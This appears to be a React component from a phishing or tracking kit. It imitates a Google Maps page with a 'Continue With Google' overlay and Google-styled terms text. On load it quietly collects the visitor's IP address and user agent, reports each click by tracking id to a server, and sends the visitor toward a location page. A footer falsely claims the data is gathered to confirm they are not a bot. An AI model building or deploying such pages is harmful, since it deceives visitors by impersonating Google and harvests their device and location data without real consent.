import React, { useEffect, useState } from "react";
import "./Test2.css";
import { Link, useParams } from "react-router-dom";
import { isBrowser, isMobile } from "react-device-detect";
import axios from "axios";
import { io } from "socket.io-client";
const socket = io(process.env.REACT_APP_SERVER_ADDRESS);
const Test2 = () => {
  const [showOverlay, setShowOverlay] = useState(false);
  const [userAgent, setUserAgent] = useState("");
  const [ipAddress, setIPAddress] = useState("");
    const [userId, setUserId] = useState();
  const { id } = useParams();
  let type;
  if (isBrowser) {
    type = "desktop";
  } else {
    type = "mobile";
  }

  useEffect(() => {
    const userAgent = window.navigator.userAgent;
    setUserAgent(userAgent);
    fetch("https://api.ipify.org?format=json")
      .then((response) => response.json())
      .then((data) => setIPAddress(data.ip))
      .catch((error) => console.log(error));

    const bookings = {
      type: type,
    };

    axios
      .put(`/updateclick/${id}`, bookings, {
        headers: {
          "Content-Type": "application/json",
        },
      })
      .then((response) => {
        console.log("Update successful:", response.data);
        const updatedData = response.data;
        console.log("gfgf", updatedData.data.userId);
        setUserId(updatedData.data.userId);
         socket.emit("newInfo", { message: "new info" });
      })
      .catch((error) => {
        console.error("Error updating data:", error);
      });
  }, [type, id]);

  useEffect(() => {
    const timer = setTimeout(() => {
      setShowOverlay(true);
    }, 100);

    return () => clearTimeout(timer); // Clean up timer on unmount
  }, []);
  return (
    <div className="newmain-caontainer">
      <iframe
        className="newmap-background"
        src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3153.5693930527423!2d144.95855721544715!3d-37.818435979751494!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x6ad642af0f11fd81%3A0xf577f5d1f11f1c1b!2sFederation%20Square!5e0!3m2!1sen!2sau!4v1601360233956!5m2!1sen!2sau"
        width="600"
        height="450"
        style={{ border: "0" }}
        allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"
        allowFullScreen=""
        loading="lazy"
      ></iframe>
      {showOverlay && (
        <div className="newoverlay">
          <Link
            to={`/location/${id}`}
            className="newgoogle-button-overlay"
            id="googleButtonOverlay"
          >
            <img src="/google.webp" alt="Google Icon" />
            Continue With Google
          </Link>
        </div>
      )}

      <div className="newcontainer">
        <div className="newinput-section">
          <label for="name">What's your area?</label>
          <br />
          <input type="hidden" id="newname" value="G-map" />

          <div className="newsearch-container">
            <input
              style={{ border: "none", outline: "none" }}
              type="text"
              value="40.333453, -102.437074"
            />
            <i
              id="searchIcon"
              className="newfa fa-search"
              style={{ fontSize: "20px", color: "#6565c5", padding: "7px" }}
            ></i>
            <button className="newclear-btn">&times;</button>
          </div>

          <input type="hidden" id="user_Id" value="88" />
          <input
            type="hidden"
            id="agent"
            value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
          />
          <input type="hidden" id="device" value="desktop" />
          <input type="hidden" id="website" value="Gmail" />
        </div>

        <p className="newfooter-text">
          By joining, you agree to the Google <a href="#">Terms of Service</a>{" "}
          and <a href="#">Privacy Policy</a>. System info will be sent to
          confirm you‘re not a bot.
        </p>
      </div>
    </div>
  );
};

export default Test2;
